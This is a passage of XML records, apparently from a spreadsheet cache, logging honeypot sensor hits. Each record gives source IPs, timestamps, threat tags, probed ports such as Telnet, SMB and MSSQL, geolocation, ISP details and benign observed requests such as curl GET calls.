    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9c1:5e0f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1786"/>
    <x v="1786"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T19:49:58"/>
    <d v="2025-04-14T19:49:58"/>
    <d v="2025-04-14T19:49:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IA"/>
    <s v="Iowa"/>
    <s v="Woodbury"/>
    <s v="Sioux City"/>
    <s v="4876523"/>
    <s v="51101"/>
    <s v="42.4925"/>
    <s v="-96.3997"/>
    <s v="11492"/>
    <s v="CABLEONE"/>
    <s v="Cable One, Inc."/>
    <s v="consumer"/>
    <s v="Sparklight"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6012:bcf1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1787"/>
    <x v="1787"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T19:28:54"/>
    <d v="2025-03-17T13:58:52"/>
    <d v="2025-04-14T19:28:54"/>
    <n v="156"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H33"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="RU"/>
    <s v="Russia"/>
    <s v="IVA"/>
    <s v="Ivanovo Oblast"/>
    <s v="Str"/>
    <s v="Zheleznodorozhnyy"/>
    <s v="6423512"/>
    <s v="NA"/>
    <s v="55.839"/>
    <s v="40.5202"/>
    <s v="197175"/>
    <s v="Albina Anatoljevna Kolesnik, PE"/>
    <s v="Albina Anatoljevna Kolesnik, PE"/>
    <s v="business"/>
    <s v="Teleradiokompaniya Vizit-A Limited"/>
    <s v="2012-08-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61996)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62208)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49753)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53424)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57361)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60927)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64509)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51577)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50932)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54261)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65387)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56052)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58453)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60892)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63336)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49441)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51931)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54427)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56929)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65522)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51950)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54786)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57601)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60313)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62966)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49292)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51937)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54614)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57274)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59842)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61982)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62156)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64351)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50177)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54484)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56595)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58708)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64990)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50671)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52750)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54819)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56884)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58959)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61041)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63122)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65217)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50976)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53090)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,55214)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52820)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63918)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49986)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52428)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57399)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59852)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54088)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56534)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59017)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61509)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64010)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50149)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52672)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,55170)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57638)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60126)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65104)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51284)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53769)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56227)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58734)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61165)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53196)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,55744)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58301)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63295)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49395)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52260)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61851)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64683)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51200)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52387)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54919)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63093)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49247)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51763)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54341)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56878)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59392)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60681)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62278)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64029)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50949)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52654)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54253)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,55973)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57634)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59302)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61010)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62614)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64316)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49610)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51263)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52946)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54549)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56234)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57925)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59631)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61330)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54092)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61675)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64030)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50102)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52527)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54841)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57246)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62544)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62631)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64459)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49703)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51281)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52925)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54609)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63407)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63962)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64449)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65018)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65489)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50080)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50631)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51100)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51571)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52078)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52581)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53119)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53586)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54094)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59130)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59607)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60109)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60545)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61077)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61558)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62057)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62528)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63015)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63495)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64008)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64495)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64978)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65484)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49573)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50112)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50557)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51035)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5bf4:e88e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1788"/>
    <x v="1788"/>
    <s v="220-132-248-112.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T19:28:50"/>
    <d v="2024-09-11T17:41:00"/>
    <d v="2025-04-14T19:28:50"/>
    <n v="357"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>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GET&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:f870"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1789"/>
    <x v="1789"/>
    <s v="NA&amp;&amp;114-33-53-209.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T19:10:53"/>
    <d v="2024-04-06T11:54:00"/>
    <d v="2025-04-14T19:10:53"/>
    <n v="337"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;48339&amp;&amp;56327&amp;&amp;23&amp;&amp;25755&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:35d1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1790"/>
    <x v="1790"/>
    <s v="220-134-92-113.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T19:10:31"/>
    <d v="2024-04-05T06:26:00"/>
    <d v="2025-04-14T19:10:31"/>
    <n v="689"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_NTP_H30&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_SSH_H18&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;443&amp;&amp;123&amp;&amp;1080&amp;&amp;22&amp;&amp;445&amp;&amp;26156&amp;&amp;23&amp;&amp;80&amp;&amp;9100&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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:5c71"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1791"/>
    <x v="1791"/>
    <s v="1-34-52-67.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:55:20"/>
    <d v="2024-09-11T05:16:00"/>
    <d v="2025-04-14T18:55:20"/>
    <n v="195"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;58321&amp;&amp;9100&amp;&amp;NA"/>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2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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122:3443"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1792"/>
    <x v="1792"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:37:38"/>
    <d v="2024-07-08T17:46:00"/>
    <d v="2025-04-14T18:37:38"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;23&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="57"/>
    <s v="Bình Dương Province"/>
    <s v="Thành Phố Thủ Dầu Một"/>
    <s v="Thu Dau Mot"/>
    <s v="1565022"/>
    <s v="NA"/>
    <s v="10.9804"/>
    <s v="106.652"/>
    <s v="45557"/>
    <s v="Vietnam Technology and Telecommunication JSC"/>
    <s v="HP-VNTT"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6799:dafa"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
